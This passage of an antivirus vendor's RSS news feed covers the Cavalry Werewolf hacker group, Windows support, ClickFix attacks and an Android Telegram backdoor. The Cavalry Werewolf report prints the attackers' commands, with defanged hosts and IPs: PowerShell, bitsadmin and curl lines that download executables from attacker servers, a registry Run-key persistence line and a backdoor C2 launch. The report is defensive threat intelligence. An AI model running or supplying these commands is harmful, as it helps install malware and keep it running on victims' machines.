            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231&lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Typical actions performed by this group in a compromised network&lt;/h3&gt;
&lt;p&gt;Once the attackers have penetrated the target organization’s infrastructure, they perform a range of actions to collect data and to establish persistence in the system.&lt;/p&gt;
&lt;p&gt;To collect information about the infected computer, they execute these commands:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — to get information about the current user;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — to get the list of files located in the “Downloads” directory of the current user;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — to get the list of files in the “Pictures” directory from a shared catalog (in order to determine which malicious programs have already been downloaded into the system);&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — to get the network configuration;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — to get a list of all of the users in the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They use the following commands to discover the system proxy and to check that outbound connections work:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;To configure the network, they use:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;a command-line tool &lt;span class="string"&gt;netsh&lt;/span&gt;, which is included in the Windows OS.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;To subsequently deliver malicious tools into the system, they use legitimate tools:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell (for example: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;Bitsadmin (for example: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;curl (for example: &lt;span class="string"&gt;curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;To get anchored in the system:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;They can modify the Windows registry (for example: &lt;span class="string"&gt;REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They use the command-line interpreter cmd.exe to launch their tool. For example:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — to launch &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\pictures\\732.exe&lt;/span&gt;  — to launch &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They can use PowerShell to delete their tools. For example:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Threat actors can also periodically check whether C2 servers are available, using the command &lt;span class="string"&gt;ping&lt;/span&gt;.&lt;/p&gt;
&lt;h3&gt;Features of the Cavalry Werewolf hacker group&lt;/h3&gt;
&lt;p&gt;The following features of the Cavalry Werewolf hacker group can be highlighted:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;they prefer using open-source software, both in its original form and as the basis for developing their own tools;&lt;/li&gt;
    &lt;li&gt;their main tools are various reverse-shell backdoors that allow commands to be executed remotely in infected systems;&lt;/li&gt;
    &lt;li&gt;they can embed malicious code into initially harmless programs;&lt;/li&gt;
    &lt;li&gt;they often use the Telegram API to control infected computers;&lt;/li&gt;
    &lt;li&gt;they use compromised email addresses and carry out phishing campaigns, sending emails under the guise of state institutions to distribute the first infection stage;&lt;/li&gt;
    &lt;li&gt;they use directories &lt;span class="string"&gt;C:\\users\\public\\pictures&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\libraries&lt;/span&gt;, and &lt;span class="string"&gt;C:\\users\\public\\downloads&lt;/span&gt; to download subsequent infection stages to the target device.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For detailed technical descriptions of identified Cavalry Werewolf tools, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;
&lt;p&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseShell.10&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.RShell.169&amp;lng=en"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.2&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Siggen2.5463&amp;lng=en"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Tunnel.41&amp;lng=en"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BAT.DownLoader.1138&amp;lng=en"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Clipper.808&amp;lng=en"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.FileSpyNET.5&amp;lng=en"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Inject5.57968&amp;lng=en"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49862&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h3&gt;MITRE matrix&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;Initial access&lt;/td&gt;
            &lt;td&gt;Spearphishing attachment (T1566.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution&lt;/td&gt;
            &lt;td&gt;User execution (T1204)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Windows Command Shell (T1059.003)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence&lt;/td&gt;
            &lt;td&gt;Registry Run Keys / Startup Folder (T1547.001)&lt;br /&gt;&lt;br /&gt;BITS Jobs (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation&lt;/td&gt;
            &lt;td&gt;Bypass User Account Control (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion&lt;/td&gt;
            &lt;td&gt;BITS Jobs (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control&lt;/td&gt;
            &lt;td&gt;External Proxy (T1090.002)&lt;br /&gt;&lt;br /&gt;Bidirectional Communication (T1102.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Exfiltration&lt;/td&gt;
            &lt;td&gt;Exfiltration Over C2 Channel (T1041)&lt;br /&gt;&lt;br /&gt;Exfiltration Over Web Service (T1567)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15073&amp;lng=en</guid><title>Dr.Web solutions support all versions of Windows, starting with Windows XP</title><link>https://news.drweb.com/show/?i=15073&amp;lng=en&amp;c=5</link><pubDate>Thu, 30 Oct 2025 15:23:15 GMT</pubDate><description>&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Because Microsoft officially discontinued its support for Windows 10 as of October 14, 2025, Doctor Web is informing its users and partners of the following.&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;&lt;br&gt;&lt;strong&gt;Support for Dr.Web products installed on computers running Windows 10&lt;/strong&gt;&lt;br&gt;Currently, all versions of Dr.Web solutions are fully compatible with Windows 10. We confirm that:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Technical support and updates for Dr.Web antivirus databases and software components are available as usual;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;With Microsoft support officially discontinued, Doctor Web is continuing to ensure that its products are compatible with Windows 10—for as long as this is possible, taking into account security requirements.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Long-term support for all versions, starting with Windows XP&lt;/strong&gt;&lt;br&gt;Even though many Windows versions lack official support, they are still actively being used in individual infrastructures—including in industry, automated control systems and specialized corporate environments.&lt;br&gt;Taking into account the needs of these users, Doctor Web is continuing to provide support for all OS versions, starting with Windows XP, in current versions of Dr.Web solutions for PC 
protection.&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="alert"&gt;&lt;p style="text-align:justify;"&gt;! Please note that using outdated versions of OSs is associated with certain risks.&lt;/p&gt;&lt;/div&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;The lack of security updates leaves vulnerabilities unclosed.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Compatibility issues connected with modern versions of application software (browsers, drivers, etc.).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Increased risk of compromise—exploits for older operating systems are widely available in open sources, and cybercriminals are still carrying out attacks on vulnerable protocols (SMBv1, TLS 1.0, etc.).&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Even if your company's business processes are critically dependent on these systems, it is strongly recommended that you plan to migrate to modern operating systems that provide security updates.&amp;nbsp;&lt;/strong&gt;&lt;br&gt;For any period that you are using outdated OS versions, you need to isolate nodes containing OS data from the Internet and your main corporate network segments through the use of VLAN, DMZ or firewalls, and you must carefully scan the entire data exchange process involving these systems for malicious content.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15074&amp;lng=en</guid><title>Understanding the ClickFix attack</title><link>https://news.drweb.com/show/?i=15074&amp;lng=en&amp;c=5</link><pubDate>Fri, 24 Oct 2025 10:52:52 GMT</pubDate><description>&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Users all over the world are getting increasingly worried as the number of ClickFix security incidents continues to grow at an alarming rate. 
Attackers are using this social engineering technique to coax users into running malicious code on their devices.&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;An attack commences when someone winds up on a compromised or bogus site and sees a warning message informing them that, for example, the webpage can't be displayed properly because of a browser error or that an update is required.&amp;nbsp;&lt;br&gt;Normally, the message is supplemented by a “Fix”, “Check” or “Update” button. Malicious code is copied into the clipboard automatically as soon as the button appears on the screen—there’s no need to even press it. The user is then prompted to paste this code into a command prompt or the “Run” dialogue box. As soon as that happens, a malicious program is installed and launched. And since the action has been initiated by the user, the antivirus often does not intervene.&lt;/p&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Below we provide a simplified recreation of a ClickFix attack.&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;When users load and view content, a warning message suddenly appears in the browser, informing them that an issue caused by a recent browser update is preventing the content from being displayed properly.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:648/328;" src="https://st.drweb.com/static/f2_admin/%D1%80%D0%B8%D1%811_isHarak.png" width="648" height="328"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The message suggests that the user perform these specific actions to resolve it:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Click the “Fix it!” button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Right-click on the Windows Start button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;In the program list, locate Windows PowerShell and open it with administrator 
permissions.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Right-click to paste the clipboard contents into the terminal window and run the command.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;As the user presses the button, a malicious script gets copied to the clipboard to be run in the terminal window.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:601/166;" src="https://st.drweb.com/static/f2_admin/%D1%80%D0%B8%D1%812_xW9xNSj.png" width="601" height="166"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The script establishes a remote connection to a C2 infrastructure that the perpetrators use to remotely control compromised systems.&amp;nbsp;&lt;br&gt;In this case, the device gets connected to a remote C2 host, and then the payload is downloaded to the user's computer. After that, the malicious executable designed to modify the hosts file is launched, and the running script is ended.&amp;nbsp;&lt;br&gt;&lt;strong&gt;Thanks to its preventive protection technologies, Dr.Web is able to detect the threat as soon as the script attempts to start the executable. &amp;nbsp;&lt;/strong&gt;&lt;br&gt;A fake CAPTCHA is another ruse commonly used in ClickFix attacks. &amp;nbsp;A supposedly legitimate CAPTCHA verification box appears on the screen, and in the meantime, malicious code is covertly copied to the clipboard. 
By engaging users in interacting with malicious content under the pretext of verifying that they’re a real person, the perpetrators make it more likely for the attack to succeed.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:931/428;" src="https://st.drweb.com/static/f2_admin/photo_2025-10-22_14-34-44_ppPWSSV.jpg" width="931" height="428"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The CAPTCHA dialogue is then replaced by instructions for additional verification steps.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:912/647;" src="https://st.drweb.com/static/f2_admin/photo_2025-10-22_14-34-42_vXyQsnu.jpg" width="912" height="647"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;By completing them, the unsuspecting user runs a malicious script that opens up a remote access route for the attackers.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Why ClickFix attacks are hard to expose&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;When a user clicks a button on a bogus site, there is not yet any malicious pattern for an antivirus to detect. At first, all the actions appear quite legitimate: the user copies and pastes commands with their own hands and runs them—seemingly going through regular system routines.&amp;nbsp;&lt;br&gt;The detection occurs later—when a malicious file is launched or if the script attempts to inject malicious code into other processes in the system. That’s when an antivirus sees the danger and eliminates it. 
In other words, protection technologies only spring into action at the post-exploitation phase when the malware is already performing its tasks by disrupting other processes or is behaving strangely.&amp;nbsp;&lt;br&gt;Usually, by this time, the attacker has been able to connect to the victim's system and the payload is already deployed and can disguise itself as a legitimate process.&amp;nbsp;&lt;br&gt;At this stage, the attacker can:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Elevate their privileges,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Collect data,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Navigate through the network,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Attempt to disable the antivirus.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;On top of that, the malicious code can also be encrypted or obfuscated to make it less recognisable by conventional security routines.&lt;/p&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Why it is important to act as early as possible&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;In the case of ClickFix incidents, preventing attackers from connecting to the system remotely can be as vital as responding to the actual threat. 
The extra security measures that may help accomplish this include:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Examining the clipboard contents whenever a suspicious message that includes commands (such as PowerShell scripts) appears in the browser.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Analysing traffic and suspicious attempts to establish a remote connection.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Teaching users how to recognise social engineering techniques by examining real attack scenarios.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15076&amp;lng=en</guid><title>Baohuo, the gray eminence. Android backdoor hijacks Telegram accounts, gaining complete control over them</title><link>https://news.drweb.com/show/?i=15076&amp;lng=en&amp;c=5</link><pubDate>Thu, 23 Oct 2025 10:32:20 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;October 23, 2025&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web has identified a dangerous backdoor, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; can conceal connections from third-party devices in the list of active Telegram sessions. 
Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, also concealing these actions. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; has exceeded 58,000.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.&lt;/p&gt;&lt;p&gt;These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertizing text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window) as well as by reviews from supposedly happy users that the threat actors actually composed. 
It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.&lt;/p&gt;&lt;p&gt;Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. At the same time, the total number of infected devices has exceeded 58,000. 
Around 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers have been infected.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_en.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_en.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Countries with the highest number of devices infected with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; (according to Doctor Web’s anti-virus laboratory)&lt;/i&gt;&lt;/p&gt;&lt;p&gt;However, malicious websites are not the only source for &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. 
We have notified the online platforms where the trojanized versions of Telegram X were found.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;The modified Telegram X with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Doctor Web’s anti-virus laboratory discovered several&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; variations, which can be conditionally divided into 3 main modification groups:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;&lt;/li&gt;&lt;li&gt;versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;&lt;/li&gt;&lt;li&gt;versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Regardless of the modification type,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. 
